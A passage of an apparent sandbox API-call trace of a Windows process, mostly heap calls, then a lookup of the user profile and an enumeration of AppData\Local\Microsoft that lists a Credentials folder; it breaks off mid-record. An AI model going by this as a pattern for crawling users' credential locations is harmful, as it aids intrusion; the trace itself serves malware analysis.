(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0244.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0244.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0244.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0244.545] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0244.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0244.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0244.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0244.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0244.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0244.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0244.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0244.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0244.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0244.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0244.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0244.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0244.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0244.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0244.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0244.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0244.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0244.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0244.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0244.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0244.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0244.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0244.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0244.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0244.550] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0244.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0244.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0244.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0244.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0244.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0244.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0244.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0244.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0244.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0244.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0244.551] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0244.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0244.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0244.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa838 [0244.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0244.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0244.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0244.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0244.551] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0244.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0244.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0244.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0244.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0244.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0244.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0244.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0244.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0244.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0244.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0244.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0244.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0244.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0244.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0244.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0244.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0244.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0244.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0244.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0244.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0244.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0244.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0244.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0244.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0244.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0244.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0244.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 0x240ca38 [0244.553] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Microsoft", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft", lpFilePart=0x8bedfc*="Microsoft") returned 0x35 [0244.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240ca38 | out: hHeap=0x25c0000) returned 1 [0244.553] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft")) returned 0x2010 [0244.553] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x962f4540, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x962f4540, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa5920 [0244.553] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x962f4540, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x962f4540, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0244.553] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0244.553] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x32121370, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x32121370, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x32121370, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Event Viewer", cAlternateFileName="EVENTV~1")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Feeds", cAlternateFileName="")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f3aae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d1d6940, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x3d1d6940, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x3d1d6940, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="FORMS", cAlternateFileName="")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd754c00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd754c00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd754c00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="IME12", cAlternateFileName="")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="IMJP8_1", cAlternateFileName="")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="IMJP9_0", cAlternateFileName="")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1d705b70, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d705b70, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf7f22040, ftLastAccessTime.dwHighDateTime=0x1d3373f, ftLastWriteTime.dwLowDateTime=0xf7f22040, ftLastWriteTime.dwHighDateTime=0x1d3373f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f780d90, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x4bb72310, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4bb72310, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Office", cAlternateFileName="")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3dc40980, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x609dab00, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x609dab00, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x110d, dwReserved1=0x4, cFileName="Outlook", cAlternateFileName="")) returned 1 [0244.554] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4bb4c1b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4bb4c1b0, 